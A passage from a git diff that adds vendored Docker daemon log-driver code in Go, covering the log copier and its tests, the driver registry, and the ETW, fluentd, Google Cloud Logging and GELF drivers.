{ + msg.Line = buf[p : p+q] + msg.Timestamp = time.Now().UTC() + msg.Partial = false + select { + case <-c.closed: + return + default: + if logErr := c.dst.Log(msg); logErr != nil { + logrus.Errorf("Failed to log msg %q for logger %s: %s", msg.Line, c.dst.Name(), logErr) + } + } + p += q + 1 + } + // If there's no more coming, or the buffer is full but + // has no newlines, log whatever we haven't logged yet, + // noting that it's a partial log line. 
+ if eof || (p == 0 && n == len(buf)) { + if p < n { + msg.Line = buf[p:n] + msg.Timestamp = time.Now().UTC() + msg.Partial = true + if logErr := c.dst.Log(msg); logErr != nil { + logrus.Errorf("Failed to log msg %q for logger %s: %s", msg.Line, c.dst.Name(), logErr) + } + p = 0 + n = 0 + } + if eof { + return + } + } + // Move any unlogged data to the front of the buffer in preparation for another read. + if p > 0 { + copy(buf[0:], buf[p:n]) + n -= p + } + } + } +} + +// Wait waits until all copying is done +func (c *Copier) Wait() { + c.copyJobs.Wait() +} + +// Close closes the copier +func (c *Copier) Close() { + c.closeOnce.Do(func() { + close(c.closed) + }) +} diff --git a/vendor/github.com/docker/docker/daemon/logger/copier_test.go b/vendor/github.com/docker/docker/daemon/logger/copier_test.go new file mode 100644 index 0000000000..cfd816a6eb --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/copier_test.go @@ -0,0 +1,296 @@ +package logger + +import ( + "bytes" + "encoding/json" + "fmt" + "io" + "os" + "strings" + "sync" + "testing" + "time" +) + +type TestLoggerJSON struct { + *json.Encoder + mu sync.Mutex + delay time.Duration +} + +func (l *TestLoggerJSON) Log(m *Message) error { + if l.delay > 0 { + time.Sleep(l.delay) + } + l.mu.Lock() + defer l.mu.Unlock() + return l.Encode(m) +} + +func (l *TestLoggerJSON) Close() error { return nil } + +func (l *TestLoggerJSON) Name() string { return "json" } + +func TestCopier(t *testing.T) { + stdoutLine := "Line that thinks that it is log line from docker stdout" + stderrLine := "Line that thinks that it is log line from docker stderr" + stdoutTrailingLine := "stdout trailing line" + stderrTrailingLine := "stderr trailing line" + + var stdout bytes.Buffer + var stderr bytes.Buffer + for i := 0; i < 30; i++ { + if _, err := stdout.WriteString(stdoutLine + "\n"); err != nil { + t.Fatal(err) + } + if _, err := stderr.WriteString(stderrLine + "\n"); err != nil { + t.Fatal(err) + } + } + + // Test 
remaining lines without line-endings + if _, err := stdout.WriteString(stdoutTrailingLine); err != nil { + t.Fatal(err) + } + if _, err := stderr.WriteString(stderrTrailingLine); err != nil { + t.Fatal(err) + } + + var jsonBuf bytes.Buffer + + jsonLog := &TestLoggerJSON{Encoder: json.NewEncoder(&jsonBuf)} + + c := NewCopier( + map[string]io.Reader{ + "stdout": &stdout, + "stderr": &stderr, + }, + jsonLog) + c.Run() + wait := make(chan struct{}) + go func() { + c.Wait() + close(wait) + }() + select { + case <-time.After(1 * time.Second): + t.Fatal("Copier failed to do its work in 1 second") + case <-wait: + } + dec := json.NewDecoder(&jsonBuf) + for { + var msg Message + if err := dec.Decode(&msg); err != nil { + if err == io.EOF { + break + } + t.Fatal(err) + } + if msg.Source != "stdout" && msg.Source != "stderr" { + t.Fatalf("Wrong Source: %q, should be %q or %q", msg.Source, "stdout", "stderr") + } + if msg.Source == "stdout" { + if string(msg.Line) != stdoutLine && string(msg.Line) != stdoutTrailingLine { + t.Fatalf("Wrong Line: %q, expected %q or %q", msg.Line, stdoutLine, stdoutTrailingLine) + } + } + if msg.Source == "stderr" { + if string(msg.Line) != stderrLine && string(msg.Line) != stderrTrailingLine { + t.Fatalf("Wrong Line: %q, expected %q or %q", msg.Line, stderrLine, stderrTrailingLine) + } + } + } +} + +// TestCopierLongLines tests long lines without line breaks +func TestCopierLongLines(t *testing.T) { + // Long lines (should be split at "bufSize") + const bufSize = 16 * 1024 + stdoutLongLine := strings.Repeat("a", bufSize) + stderrLongLine := strings.Repeat("b", bufSize) + stdoutTrailingLine := "stdout trailing line" + stderrTrailingLine := "stderr trailing line" + + var stdout bytes.Buffer + var stderr bytes.Buffer + + for i := 0; i < 3; i++ { + if _, err := stdout.WriteString(stdoutLongLine); err != nil { + t.Fatal(err) + } + if _, err := stderr.WriteString(stderrLongLine); err != nil { + t.Fatal(err) + } + } + + if _, err := 
stdout.WriteString(stdoutTrailingLine); err != nil { + t.Fatal(err) + } + if _, err := stderr.WriteString(stderrTrailingLine); err != nil { + t.Fatal(err) + } + + var jsonBuf bytes.Buffer + + jsonLog := &TestLoggerJSON{Encoder: json.NewEncoder(&jsonBuf)} + + c := NewCopier( + map[string]io.Reader{ + "stdout": &stdout, + "stderr": &stderr, + }, + jsonLog) + c.Run() + wait := make(chan struct{}) + go func() { + c.Wait() + close(wait) + }() + select { + case <-time.After(1 * time.Second): + t.Fatal("Copier failed to do its work in 1 second") + case <-wait: + } + dec := json.NewDecoder(&jsonBuf) + for { + var msg Message + if err := dec.Decode(&msg); err != nil { + if err == io.EOF { + break + } + t.Fatal(err) + } + if msg.Source != "stdout" && msg.Source != "stderr" { + t.Fatalf("Wrong Source: %q, should be %q or %q", msg.Source, "stdout", "stderr") + } + if msg.Source == "stdout" { + if string(msg.Line) != stdoutLongLine && string(msg.Line) != stdoutTrailingLine { + t.Fatalf("Wrong Line: %q, expected 'stdoutLongLine' or 'stdoutTrailingLine'", msg.Line) + } + } + if msg.Source == "stderr" { + if string(msg.Line) != stderrLongLine && string(msg.Line) != stderrTrailingLine { + t.Fatalf("Wrong Line: %q, expected 'stderrLongLine' or 'stderrTrailingLine'", msg.Line) + } + } + } +} + +func TestCopierSlow(t *testing.T) { + stdoutLine := "Line that thinks that it is log line from docker stdout" + var stdout bytes.Buffer + for i := 0; i < 30; i++ { + if _, err := stdout.WriteString(stdoutLine + "\n"); err != nil { + t.Fatal(err) + } + } + + var jsonBuf bytes.Buffer + //encoder := &encodeCloser{Encoder: json.NewEncoder(&jsonBuf)} + jsonLog := &TestLoggerJSON{Encoder: json.NewEncoder(&jsonBuf), delay: 100 * time.Millisecond} + + c := NewCopier(map[string]io.Reader{"stdout": &stdout}, jsonLog) + c.Run() + wait := make(chan struct{}) + go func() { + c.Wait() + close(wait) + }() + <-time.After(150 * time.Millisecond) + c.Close() + select { + case <-time.After(200 * 
time.Millisecond): + t.Fatalf("failed to exit in time after the copier is closed") + case <-wait: + } +} + +type BenchmarkLoggerDummy struct { +} + +func (l *BenchmarkLoggerDummy) Log(m *Message) error { return nil } + +func (l *BenchmarkLoggerDummy) Close() error { return nil } + +func (l *BenchmarkLoggerDummy) Name() string { return "dummy" } + +func BenchmarkCopier64(b *testing.B) { + benchmarkCopier(b, 1<<6) +} +func BenchmarkCopier128(b *testing.B) { + benchmarkCopier(b, 1<<7) +} +func BenchmarkCopier256(b *testing.B) { + benchmarkCopier(b, 1<<8) +} +func BenchmarkCopier512(b *testing.B) { + benchmarkCopier(b, 1<<9) +} +func BenchmarkCopier1K(b *testing.B) { + benchmarkCopier(b, 1<<10) +} +func BenchmarkCopier2K(b *testing.B) { + benchmarkCopier(b, 1<<11) +} +func BenchmarkCopier4K(b *testing.B) { + benchmarkCopier(b, 1<<12) +} +func BenchmarkCopier8K(b *testing.B) { + benchmarkCopier(b, 1<<13) +} +func BenchmarkCopier16K(b *testing.B) { + benchmarkCopier(b, 1<<14) +} +func BenchmarkCopier32K(b *testing.B) { + benchmarkCopier(b, 1<<15) +} +func BenchmarkCopier64K(b *testing.B) { + benchmarkCopier(b, 1<<16) +} +func BenchmarkCopier128K(b *testing.B) { + benchmarkCopier(b, 1<<17) +} +func BenchmarkCopier256K(b *testing.B) { + benchmarkCopier(b, 1<<18) +} + +func piped(b *testing.B, iterations int, delay time.Duration, buf []byte) io.Reader { + r, w, err := os.Pipe() + if err != nil { + b.Fatal(err) + return nil + } + go func() { + for i := 0; i < iterations; i++ { + time.Sleep(delay) + if n, err := w.Write(buf); err != nil || n != len(buf) { + if err != nil { + b.Fatal(err) + } + b.Fatal(fmt.Errorf("short write")) + } + } + w.Close() + }() + return r +} + +func benchmarkCopier(b *testing.B, length int) { + b.StopTimer() + buf := []byte{'A'} + for len(buf) < length { + buf = append(buf, buf...) + } + buf = append(buf[:length-1], []byte{'\n'}...) 
+ b.StartTimer() + for i := 0; i < b.N; i++ { + c := NewCopier( + map[string]io.Reader{ + "buffer": piped(b, 10, time.Nanosecond, buf), + }, + &BenchmarkLoggerDummy{}) + c.Run() + c.Wait() + c.Close() + } +} diff --git a/vendor/github.com/docker/docker/daemon/logger/etwlogs/etwlogs_windows.go b/vendor/github.com/docker/docker/daemon/logger/etwlogs/etwlogs_windows.go new file mode 100644 index 0000000000..f296d7f165 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/etwlogs/etwlogs_windows.go @@ -0,0 +1,170 @@ +// Package etwlogs provides a log driver for forwarding container logs +// as ETW events.(ETW stands for Event Tracing for Windows) +// A client can then create an ETW listener to listen for events that are sent +// by the ETW provider that we register, using the provider's GUID "a3693192-9ed6-46d2-a981-f8226c8363bd". +// Here is an example of how to do this using the logman utility: +// 1. logman start -ets DockerContainerLogs -p {a3693192-9ed6-46d2-a981-f8226c8363bd} 0 0 -o trace.etl +// 2. Run container(s) and generate log messages +// 3. logman stop -ets DockerContainerLogs +// 4. You can then convert the etl log file to XML using: tracerpt -y trace.etl +// +// Each container log message generates an ETW event that also contains: +// the container name and ID, the timestamp, and the stream type. 
+package etwlogs + +import ( + "errors" + "fmt" + "sync" + "syscall" + "unsafe" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/daemon/logger" + "golang.org/x/sys/windows" +) + +type etwLogs struct { + containerName string + imageName string + containerID string + imageID string +} + +const ( + name = "etwlogs" + win32CallSuccess = 0 +) + +var ( + modAdvapi32 = windows.NewLazySystemDLL("Advapi32.dll") + procEventRegister = modAdvapi32.NewProc("EventRegister") + procEventWriteString = modAdvapi32.NewProc("EventWriteString") + procEventUnregister = modAdvapi32.NewProc("EventUnregister") +) +var providerHandle syscall.Handle +var refCount int +var mu sync.Mutex + +func init() { + providerHandle = syscall.InvalidHandle + if err := logger.RegisterLogDriver(name, New); err != nil { + logrus.Fatal(err) + } +} + +// New creates a new etwLogs logger for the given container and registers the EWT provider. +func New(ctx logger.Context) (logger.Logger, error) { + if err := registerETWProvider(); err != nil { + return nil, err + } + logrus.Debugf("logging driver etwLogs configured for container: %s.", ctx.ContainerID) + + return &etwLogs{ + containerName: fixContainerName(ctx.ContainerName), + imageName: ctx.ContainerImageName, + containerID: ctx.ContainerID, + imageID: ctx.ContainerImageID, + }, nil +} + +// Log logs the message to the ETW stream. +func (etwLogger *etwLogs) Log(msg *logger.Message) error { + if providerHandle == syscall.InvalidHandle { + // This should never be hit, if it is, it indicates a programming error. + errorMessage := "ETWLogs cannot log the message, because the event provider has not been registered." + logrus.Error(errorMessage) + return errors.New(errorMessage) + } + return callEventWriteString(createLogMessage(etwLogger, msg)) +} + +// Close closes the logger by unregistering the ETW provider. 
+func (etwLogger *etwLogs) Close() error { + unregisterETWProvider() + return nil +} + +func (etwLogger *etwLogs) Name() string { + return name +} + +func createLogMessage(etwLogger *etwLogs, msg *logger.Message) string { + return fmt.Sprintf("container_name: %s, image_name: %s, container_id: %s, image_id: %s, source: %s, log: %s", + etwLogger.containerName, + etwLogger.imageName, + etwLogger.containerID, + etwLogger.imageID, + msg.Source, + msg.Line) +} + +// fixContainerName removes the initial '/' from the container name. +func fixContainerName(cntName string) string { + if len(cntName) > 0 && cntName[0] == '/' { + cntName = cntName[1:] + } + return cntName +} + +func registerETWProvider() error { + mu.Lock() + defer mu.Unlock() + if refCount == 0 { + var err error + if err = callEventRegister(); err != nil { + return err + } + } + + refCount++ + return nil +} + +func unregisterETWProvider() { + mu.Lock() + defer mu.Unlock() + if refCount == 1 { + if callEventUnregister() { + refCount-- + providerHandle = syscall.InvalidHandle + } + // Not returning an error if EventUnregister fails, because etwLogs will continue to work + } else { + refCount-- + } +} + +func callEventRegister() error { + // The provider's GUID is {a3693192-9ed6-46d2-a981-f8226c8363bd} + guid := syscall.GUID{ + 0xa3693192, 0x9ed6, 0x46d2, + [8]byte{0xa9, 0x81, 0xf8, 0x22, 0x6c, 0x83, 0x63, 0xbd}, + } + + ret, _, _ := procEventRegister.Call(uintptr(unsafe.Pointer(&guid)), 0, 0, uintptr(unsafe.Pointer(&providerHandle))) + if ret != win32CallSuccess { + errorMessage := fmt.Sprintf("Failed to register ETW provider. Error: %d", ret) + logrus.Error(errorMessage) + return errors.New(errorMessage) + } + return nil +} + +func callEventWriteString(message string) error { + ret, _, _ := procEventWriteString.Call(uintptr(providerHandle), 0, 0, uintptr(unsafe.Pointer(syscall.StringToUTF16Ptr(message)))) + if ret != win32CallSuccess { + errorMessage := fmt.Sprintf("ETWLogs provider failed to log message. 
Error: %d", ret) + logrus.Error(errorMessage) + return errors.New(errorMessage) + } + return nil +} + +func callEventUnregister() bool { + ret, _, _ := procEventUnregister.Call(uintptr(providerHandle)) + if ret != win32CallSuccess { + return false + } + return true +} diff --git a/vendor/github.com/docker/docker/daemon/logger/factory.go b/vendor/github.com/docker/docker/daemon/logger/factory.go new file mode 100644 index 0000000000..9cf716b09a --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/factory.go @@ -0,0 +1,104 @@ +package logger + +import ( + "fmt" + "sync" +) + +// Creator builds a logging driver instance with given context. +type Creator func(Context) (Logger, error) + +// LogOptValidator checks the options specific to the underlying +// logging implementation. +type LogOptValidator func(cfg map[string]string) error + +type logdriverFactory struct { + registry map[string]Creator + optValidator map[string]LogOptValidator + m sync.Mutex +} + +func (lf *logdriverFactory) register(name string, c Creator) error { + if lf.driverRegistered(name) { + return fmt.Errorf("logger: log driver named '%s' is already registered", name) + } + + lf.m.Lock() + lf.registry[name] = c + lf.m.Unlock() + return nil +} + +func (lf *logdriverFactory) driverRegistered(name string) bool { + lf.m.Lock() + _, ok := lf.registry[name] + lf.m.Unlock() + return ok +} + +func (lf *logdriverFactory) registerLogOptValidator(name string, l LogOptValidator) error { + lf.m.Lock() + defer lf.m.Unlock() + + if _, ok := lf.optValidator[name]; ok { + return fmt.Errorf("logger: log validator named '%s' is already registered", name) + } + lf.optValidator[name] = l + return nil +} + +func (lf *logdriverFactory) get(name string) (Creator, error) { + lf.m.Lock() + defer lf.m.Unlock() + + c, ok := lf.registry[name] + if !ok { + return c, fmt.Errorf("logger: no log driver named '%s' is registered", name) + } + return c, nil +} + +func (lf *logdriverFactory) getLogOptValidator(name string) 
LogOptValidator { + lf.m.Lock() + defer lf.m.Unlock() + + c, _ := lf.optValidator[name] + return c +} + +var factory = &logdriverFactory{registry: make(map[string]Creator), optValidator: make(map[string]LogOptValidator)} // global factory instance + +// RegisterLogDriver registers the given logging driver builder with given logging +// driver name. +func RegisterLogDriver(name string, c Creator) error { + return factory.register(name, c) +} + +// RegisterLogOptValidator registers the logging option validator with +// the given logging driver name. +func RegisterLogOptValidator(name string, l LogOptValidator) error { + return factory.registerLogOptValidator(name, l) +} + +// GetLogDriver provides the logging driver builder for a logging driver name. +func GetLogDriver(name string) (Creator, error) { + return factory.get(name) +} + +// ValidateLogOpts checks the options for the given log driver. The +// options supported are specific to the LogDriver implementation. +func ValidateLogOpts(name string, cfg map[string]string) error { + if name == "none" { + return nil + } + + if !factory.driverRegistered(name) { + return fmt.Errorf("logger: no log driver named '%s' is registered", name) + } + + validator := factory.getLogOptValidator(name) + if validator != nil { + return validator(cfg) + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/logger/fluentd/fluentd.go b/vendor/github.com/docker/docker/daemon/logger/fluentd/fluentd.go new file mode 100644 index 0000000000..a8303cf97b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/fluentd/fluentd.go @@ -0,0 +1,246 @@ +// Package fluentd provides the log driver for forwarding server logs +// to fluentd endpoints. 
+package fluentd + +import ( + "fmt" + "math" + "net" + "net/url" + "strconv" + "strings" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/daemon/logger/loggerutils" + "github.com/docker/docker/pkg/urlutil" + "github.com/docker/go-units" + "github.com/fluent/fluent-logger-golang/fluent" + "github.com/pkg/errors" +) + +type fluentd struct { + tag string + containerID string + containerName string + writer *fluent.Fluent + extra map[string]string +} + +type location struct { + protocol string + host string + port int + path string +} + +const ( + name = "fluentd" + + defaultProtocol = "tcp" + defaultHost = "127.0.0.1" + defaultPort = 24224 + defaultBufferLimit = 1024 * 1024 + + // logger tries to reconnect 2**32 - 1 times + // failed (and panic) after 204 years [ 1.5 ** (2**32 - 1) - 1 seconds] + defaultRetryWait = 1000 + defaultMaxRetries = math.MaxInt32 + + addressKey = "fluentd-address" + bufferLimitKey = "fluentd-buffer-limit" + retryWaitKey = "fluentd-retry-wait" + maxRetriesKey = "fluentd-max-retries" + asyncConnectKey = "fluentd-async-connect" +) + +func init() { + if err := logger.RegisterLogDriver(name, New); err != nil { + logrus.Fatal(err) + } + if err := logger.RegisterLogOptValidator(name, ValidateLogOpt); err != nil { + logrus.Fatal(err) + } +} + +// New creates a fluentd logger using the configuration passed in on +// the context. The supported context configuration variable is +// fluentd-address. 
+func New(ctx logger.Context) (logger.Logger, error) { + loc, err := parseAddress(ctx.Config[addressKey]) + if err != nil { + return nil, err + } + + tag, err := loggerutils.ParseLogTag(ctx, loggerutils.DefaultTemplate) + if err != nil { + return nil, err + } + + extra := ctx.ExtraAttributes(nil) + + bufferLimit := defaultBufferLimit + if ctx.Config[bufferLimitKey] != "" { + bl64, err := units.RAMInBytes(ctx.Config[bufferLimitKey]) + if err != nil { + return nil, err + } + bufferLimit = int(bl64) + } + + retryWait := defaultRetryWait + if ctx.Config[retryWaitKey] != "" { + rwd, err := time.ParseDuration(ctx.Config[retryWaitKey]) + if err != nil { + return nil, err + } + retryWait = int(rwd.Seconds() * 1000) + } + + maxRetries := defaultMaxRetries + if ctx.Config[maxRetriesKey] != "" { + mr64, err := strconv.ParseUint(ctx.Config[maxRetriesKey], 10, strconv.IntSize) + if err != nil { + return nil, err + } + maxRetries = int(mr64) + } + + asyncConnect := false + if ctx.Config[asyncConnectKey] != "" { + if asyncConnect, err = strconv.ParseBool(ctx.Config[asyncConnectKey]); err != nil { + return nil, err + } + } + + fluentConfig := fluent.Config{ + FluentPort: loc.port, + FluentHost: loc.host, + FluentNetwork: loc.protocol, + FluentSocketPath: loc.path, + BufferLimit: bufferLimit, + RetryWait: retryWait, + MaxRetry: maxRetries, + AsyncConnect: asyncConnect, + } + + logrus.WithField("container", ctx.ContainerID).WithField("config", fluentConfig). 
+ Debug("logging driver fluentd configured") + + log, err := fluent.New(fluentConfig) + if err != nil { + return nil, err + } + return &fluentd{ + tag: tag, + containerID: ctx.ContainerID, + containerName: ctx.ContainerName, + writer: log, + extra: extra, + }, nil +} + +func (f *fluentd) Log(msg *logger.Message) error { + data := map[string]string{ + "container_id": f.containerID, + "container_name": f.containerName, + "source": msg.Source, + "log": string(msg.Line), + } + for k, v := range f.extra { + data[k] = v + } + // fluent-logger-golang buffers logs from failures and disconnections, + // and these are transferred again automatically. + return f.writer.PostWithTime(f.tag, msg.Timestamp, data) +} + +func (f *fluentd) Close() error { + return f.writer.Close() +} + +func (f *fluentd) Name() string { + return name +} + +// ValidateLogOpt looks for fluentd specific log option fluentd-address. +func ValidateLogOpt(cfg map[string]string) error { + for key := range cfg { + switch key { + case "env": + case "labels": + case "tag": + case addressKey: + case bufferLimitKey: + case retryWaitKey: + case maxRetriesKey: + case asyncConnectKey: + // Accepted + default: + return fmt.Errorf("unknown log opt '%s' for fluentd log driver", key) + } + } + + if _, err := parseAddress(cfg["fluentd-address"]); err != nil { + return err + } + + return nil +} + +func parseAddress(address string) (*location, error) { + if address == "" { + return &location{ + protocol: defaultProtocol, + host: defaultHost, + port: defaultPort, + path: "", + }, nil + } + + protocol := defaultProtocol + givenAddress := address + if urlutil.IsTransportURL(address) { + url, err := url.Parse(address) + if err != nil { + return nil, errors.Wrapf(err, "invalid fluentd-address %s", givenAddress) + } + // unix and unixgram socket + if url.Scheme == "unix" || url.Scheme == "unixgram" { + return &location{ + protocol: url.Scheme, + host: "", + port: 0, + path: url.Path, + }, nil + } + // tcp|udp + protocol = 
url.Scheme + address = url.Host + } + + host, port, err := net.SplitHostPort(address) + if err != nil { + if !strings.Contains(err.Error(), "missing port in address") { + return nil, errors.Wrapf(err, "invalid fluentd-address %s", givenAddress) + } + return &location{ + protocol: protocol, + host: host, + port: defaultPort, + path: "", + }, nil + } + + portnum, err := strconv.Atoi(port) + if err != nil { + return nil, errors.Wrapf(err, "invalid fluentd-address %s", givenAddress) + } + return &location{ + protocol: protocol, + host: host, + port: portnum, + path: "", + }, nil +} diff --git a/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging.go b/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging.go new file mode 100644 index 0000000000..9a8c1c903f --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging.go @@ -0,0 +1,200 @@ +package gcplogs + +import ( + "fmt" + "sync" + "sync/atomic" + "time" + + "github.com/docker/docker/daemon/logger" + + "github.com/Sirupsen/logrus" + "golang.org/x/net/context" + "google.golang.org/cloud/compute/metadata" + "google.golang.org/cloud/logging" +) + +const ( + name = "gcplogs" + + projectOptKey = "gcp-project" + logLabelsKey = "labels" + logEnvKey = "env" + logCmdKey = "gcp-log-cmd" + logZoneKey = "gcp-meta-zone" + logNameKey = "gcp-meta-name" + logIDKey = "gcp-meta-id" +) + +var ( + // The number of logs the gcplogs driver has dropped. 
+ droppedLogs uint64 + + onGCE bool + + // instance metadata populated from the metadata server if available + projectID string + zone string + instanceName string + instanceID string +) + +func init() { + + if err := logger.RegisterLogDriver(name, New); err != nil { + logrus.Fatal(err) + } + + if err := logger.RegisterLogOptValidator(name, ValidateLogOpts); err != nil { + logrus.Fatal(err) + } +} + +type gcplogs struct { + client *logging.Client + instance *instanceInfo + container *containerInfo +} + +type dockerLogEntry struct { + Instance *instanceInfo `json:"instance,omitempty"` + Container *containerInfo `json:"container,omitempty"` + Data string `json:"data,omitempty"` +} + +type instanceInfo struct { + Zone string `json:"zone,omitempty"` + Name string `json:"name,omitempty"` + ID string `json:"id,omitempty"` +} + +type containerInfo struct { + Name string `json:"name,omitempty"` + ID string `json:"id,omitempty"` + ImageName string `json:"imageName,omitempty"` + ImageID string `json:"imageId,omitempty"` + Created time.Time `json:"created,omitempty"` + Command string `json:"command,omitempty"` + Metadata map[string]string `json:"metadata,omitempty"` +} + +var initGCPOnce sync.Once + +func initGCP() { + initGCPOnce.Do(func() { + onGCE = metadata.OnGCE() + if onGCE { + // These will fail on instances if the metadata service is + // down or the client is compiled with an API version that + // has been removed. Since these are not vital, let's ignore + // them and make their fields in the dockeLogEntry ,omitempty + projectID, _ = metadata.ProjectID() + zone, _ = metadata.Zone() + instanceName, _ = metadata.InstanceName() + instanceID, _ = metadata.InstanceID() + } + }) +} + +// New creates a new logger that logs to Google Cloud Logging using the application +// default credentials. 
+// +// See https://developers.google.com/identity/protocols/application-default-credentials +func New(ctx logger.Context) (logger.Logger, error) { + initGCP() + + var project string + if projectID != "" { + project = projectID + } + if projectID, found := ctx.Config[projectOptKey]; found { + project = projectID + } + if project == "" { + return nil, fmt.Errorf("No project was specified and couldn't read project from the meatadata server. Please specify a project") + } + + c, err := logging.NewClient(context.Background(), project, "gcplogs-docker-driver") + if err != nil { + return nil, err + } + + if err := c.Ping(); err != nil { + return nil, fmt.Errorf("unable to connect or authenticate with Google Cloud Logging: %v", err) + } + + l := &gcplogs{ + client: c, + container: &containerInfo{ + Name: ctx.ContainerName, + ID: ctx.ContainerID, + ImageName: ctx.ContainerImageName, + ImageID: ctx.ContainerImageID, + Created: ctx.ContainerCreated, + Metadata: ctx.ExtraAttributes(nil), + }, + } + + if ctx.Config[logCmdKey] == "true" { + l.container.Command = ctx.Command() + } + + if onGCE { + l.instance = &instanceInfo{ + Zone: zone, + Name: instanceName, + ID: instanceID, + } + } else if ctx.Config[logZoneKey] != "" || ctx.Config[logNameKey] != "" || ctx.Config[logIDKey] != "" { + l.instance = &instanceInfo{ + Zone: ctx.Config[logZoneKey], + Name: ctx.Config[logNameKey], + ID: ctx.Config[logIDKey], + } + } + + // The logger "overflows" at a rate of 10,000 logs per second and this + // overflow func is called. We want to surface the error to the user + // without overly spamming /var/log/docker.log so we log the first time + // we overflow and every 1000th time after. + c.Overflow = func(_ *logging.Client, _ logging.Entry) error { + if i := atomic.AddUint64(&droppedLogs, 1); i%1000 == 1 { + logrus.Errorf("gcplogs driver has dropped %v logs", i) + } + return nil + } + + return l, nil +} + +// ValidateLogOpts validates the opts passed to the gcplogs driver. 
Currently, the gcplogs +// driver doesn't take any arguments. +func ValidateLogOpts(cfg map[string]string) error { + for k := range cfg { + switch k { + case projectOptKey, logLabelsKey, logEnvKey, logCmdKey, logZoneKey, logNameKey, logIDKey: + default: + return fmt.Errorf("%q is not a valid option for the gcplogs driver", k) + } + } + return nil +} + +func (l *gcplogs) Log(m *logger.Message) error { + return l.client.Log(logging.Entry{ + Time: m.Timestamp, + Payload: &dockerLogEntry{ + Instance: l.instance, + Container: l.container, + Data: string(m.Line), + }, + }) +} + +func (l *gcplogs) Close() error { + return l.client.Flush() +} + +func (l *gcplogs) Name() string { + return name +} diff --git a/vendor/github.com/docker/docker/daemon/logger/gelf/gelf.go b/vendor/github.com/docker/docker/daemon/logger/gelf/gelf.go new file mode 100644 index 0000000000..95860ac083 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/gelf/gelf.go @@ -0,0 +1,209 @@ +// +build linux + +// Package gelf provides the log driver for forwarding server logs to +// endpoints that support the Graylog Extended Log Format. +package gelf + +import ( + "bytes" + "compress/flate" + "encoding/json" + "fmt" + "net" + "net/url" + "strconv" + "time" + + "github.com/Graylog2/go-gelf/gelf" + "github.com/Sirupsen/logrus" + "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/daemon/logger/loggerutils" + "github.com/docker/docker/pkg/urlutil" +) + +const name = "gelf" + +type gelfLogger struct { + writer *gelf.Writer + ctx logger.Context + hostname string + rawExtra json.RawMessage +} + +func init() { + if err := logger.RegisterLogDriver(name, New); err != nil { + logrus.Fatal(err) + } + if err := logger.RegisterLogOptValidator(name, ValidateLogOpt); err != nil { + logrus.Fatal(err) + } +} + +// New creates a gelf logger using the configuration passed in on the +// context. The supported context configuration variable is gelf-address. 
+func New(ctx logger.Context) (logger.Logger, error) { + // parse gelf address + address, err := parseAddress(ctx.Config["gelf-address"]) + if err != nil { + return nil, err + } + + // collect extra data for GELF message + hostname, err := ctx.Hostname() + if err != nil { + return nil, fmt.Errorf("gelf: cannot access hostname to set source field") + } + + // remove trailing slash from container name + containerName := bytes.TrimLeft([]byte(ctx.ContainerName), "/") + + // parse log tag + tag, err := loggerutils.ParseLogTag(ctx, loggerutils.DefaultTemplate) + if err != nil { + return nil, err + } + + extra := map[string]interface{}{ + "_container_id": ctx.ContainerID, + "_container_name": string(containerName), + "_image_id": ctx.ContainerImageID, + "_image_name": ctx.ContainerImageName, + "_command": ctx.Command(), + "_tag": tag, + "_created": ctx.ContainerCreated, + } + + extraAttrs := ctx.ExtraAttributes(func(key string) string { + if key[0] == '_' { + return key + } + return "_" + key + }) + for k, v := range extraAttrs { + extra[k] = v + } + + rawExtra, err := json.Marshal(extra) + if err != nil { + return nil, err + } + + // create new gelfWriter + gelfWriter, err := gelf.NewWriter(address) + if err != nil { + return nil, fmt.Errorf("gelf: cannot connect to GELF endpoint: %s %v", address, err) + } + + if v, ok := ctx.Config["gelf-compression-type"]; ok { + switch v { + case "gzip": + gelfWriter.CompressionType = gelf.CompressGzip + case "zlib": + gelfWriter.CompressionType = gelf.CompressZlib + case "none": + gelfWriter.CompressionType = gelf.CompressNone + default: + return nil, fmt.Errorf("gelf: invalid compression type %q", v) + } + } + + if v, ok := ctx.Config["gelf-compression-level"]; ok { + val, err := strconv.Atoi(v) + if err != nil { + return nil, fmt.Errorf("gelf: invalid compression level %s, err %v", v, err) + } + gelfWriter.CompressionLevel = val + } + + return &gelfLogger{ + writer: gelfWriter, + ctx: ctx, + hostname: hostname, + rawExtra: 
rawExtra, + }, nil +} + +func (s *gelfLogger) Log(msg *logger.Message) error { + level := gelf.LOG_INFO + if msg.Source == "stderr" { + level = gelf.LOG_ERR + } + + m := gelf.Message{ + Version: "1.1", + Host: s.hostname, + Short: string(msg.Line), + TimeUnix: float64(msg.Timestamp.UnixNano()/int64(time.Millisecond)) / 1000.0, + Level: level, + RawExtra: s.rawExtra, + } + + if err := s.writer.WriteMessage(&m); err != nil { + return fmt.Errorf("gelf: cannot send GELF message: %v", err) + } + return nil +} + +func (s *gelfLogger) Close() error { + return s.writer.Close() +} + +func (s *gelfLogger) Name() string { + return name +} + +// ValidateLogOpt looks for gelf specific log option gelf-address. +func ValidateLogOpt(cfg map[string]string) error { + for key, val := range cfg { + switch key { + case "gelf-address": + case "tag": + case "labels": + case "env": + case "gelf-compression-level": + i, err := strconv.Atoi(val) + if err != nil || i < flate.DefaultCompression || i > flate.BestCompression { + return fmt.Errorf("unknown value %q for log opt %q for gelf log driver", val, key) + } + case "gelf-compression-type": + switch val { + case "gzip", "zlib", "none": + default: + return fmt.Errorf("unknown value %q for log opt %q for gelf log driver", val, key) + } + default: + return fmt.Errorf("unknown log opt %q for gelf log driver", key) + } + } + + if _, err := parseAddress(cfg["gelf-address"]); err != nil { + return err + } + + return nil +} + +func parseAddress(address string) (string, error) { + if address == "" { + return "", nil + } + if !urlutil.IsTransportURL(address) { + return "", fmt.Errorf("gelf-address should be in form proto://address, got %v", address) + } + url, err := url.Parse(address) + if err != nil { + return "", err + } + + // we support only udp + if 